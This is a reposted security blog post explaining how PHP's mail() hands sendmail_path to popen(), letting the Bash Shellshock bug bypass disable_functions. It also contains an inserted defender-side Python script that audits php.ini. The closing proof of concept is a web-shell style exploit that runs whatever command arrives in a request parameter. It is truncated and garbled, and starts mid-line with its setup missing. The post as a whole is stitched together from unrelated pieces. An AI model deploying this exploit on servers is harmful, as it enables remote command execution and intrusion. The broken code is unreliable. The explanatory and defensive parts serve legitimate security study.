PHP Execute Command Bypass Disable_functions

admin | 2021-04-02 20:27:18 | 23 views | 1486 characters | 4 min 57 s read


phith0n (I won't be sad either, don't look down on me) | 2014-11-18 14:09

First, a brief look at how PHP invokes the mail() function.

In the source, ext/mail.c,

line 236:

char *sendmail_path = INI_STR("sendmail_path");
char *sendmail_cmd = NULL;

It reads the sendmail_path variable from the INI. Let's see how php.ini describes it:

; For Unix only. You may supply arguments as well (default: "sendmail -t -i").
;sendmail_path =

The comment shows that the default value of sendmail_path is "sendmail -t -i".

When extra_cmd (extra arguments passed in by the user) is present, spprintf is called to combine sendmail_path and extra_cmd into the command line that is actually executed, sendmail_cmd. When it is absent, sendmail_path is assigned directly to sendmail_cmd.

As follows:

  if (!sendmail_path) {
#if (defined PHP_WIN32 || defined NETWARE)
    /* handle old style win smtp sending */
    if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
      if (tsm_errmsg) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
        efree(tsm_errmsg);
      } else {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
      }
      MAIL_RET(0);
    }
    MAIL_RET(1);
#else
    MAIL_RET(0);
#endif
  }
  if (extra_cmd != NULL) {
    spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
  } else {
    sendmail_cmd = sendmail_path;
  }

It is then executed:

#ifdef PHP_WIN32
  sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
#else
  /* Since popen() doesn't indicate if the internal fork() doesn't work
   * (e.g. the shell can't be executed) we explicitly set it to 0 to be
   * sure we don't catch any older errno value. */
  errno = 0;
  sendmail = popen(sendmail_cmd, "w");
#endif

sendmail_cmd is handed to popen for execution.

If the system's default sh is bash, popen hands the command to bash. The earlier Bash "Shellshock" vulnerability (CVE-2014-6271) therefore lets us execute arbitrary commands through the mail() function, bypassing disable_functions.

Affected versions: all PHP versions

Fix: patch CVE-2014-6271
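As an added defender-side example (not part of phith0n's post), the following Python audits a php.ini for the path described above: whether mail() and putenv() are still callable when disable_functions is relied upon, and which command mail() would hand to popen(). The two ini texts are constructed samples, and the fallback command is the default quoted from the php.ini comment above.

```python
# Audit a php.ini for the mail() -> sendmail_path -> popen() path (added example).
# Default named in the php.ini comment quoted above (used when sendmail_path is unset).
DEFAULT_SENDMAIL = "sendmail -t -i"

# Constructed sample: blocks the usual exec family but leaves mail()/putenv() callable.
WEAK_INI = """
[PHP]
disable_functions = exec,system,passthru,shell_exec,popen,proc_open
;sendmail_path =
"""

# Constructed sample: also closes the mail() path and the environment route.
HARDENED_INI = """
[PHP]
disable_functions = "exec,system,passthru,shell_exec,popen,proc_open,mail,putenv"
sendmail_path = /usr/sbin/sendmail -t -i   ; explicit, so nothing relies on defaults
"""


def parse_php_ini(text):
    """Return {directive: value} for active lines; comments, [sections] and blanks are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        # Drop a trailing ';' comment and surrounding quotes from the value.
        value = value.split(";", 1)[0].strip().strip('"')
        settings[key.strip().lower()] = value
    return settings


def audit_mail_path(ini_text):
    """Report whether a script could still reach the system shell through mail()."""
    s = parse_php_ini(ini_text)
    disabled = {f.strip().lower() for f in s.get("disable_functions", "").split(",") if f.strip()}
    sendmail_cmd = s.get("sendmail_path") or DEFAULT_SENDMAIL
    findings = []
    if "mail" not in disabled:
        findings.append(f"mail() callable: would popen() '{sendmail_cmd}' through the system shell")
    if "putenv" not in disabled:
        findings.append("putenv() callable: script controls the environment the spawned shell inherits")
    return {"mail_disabled": "mail" in disabled, "putenv_disabled": "putenv" in disabled,
            "sendmail_cmd": sendmail_cmd, "findings": findings}


if __name__ == "__main__":
    print(audit_mail_path(WEAK_INI)["findings"])
```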

The PoC ("PHP 5.x - Bypass Disable Functions (via Shellshock)") is as follows:

$tmp 2>&1");
   // In Safe Mode, the user may only alter environment variables whose names
   // begin with the prefixes supplied by this directive.
   // By default, users will only be able to set environment variables that
   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
   // PHP will let the user modify ANY environment variable!
   mail("[email protected]","","","","-bv"); // -bv so we don't actually send any mail
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>

[Original article]

Source: lcx.cc: PHP Execute Command Bypass Disable_functions


Reposted on CN-SEC: https://cn-sec.com/archives/317421.html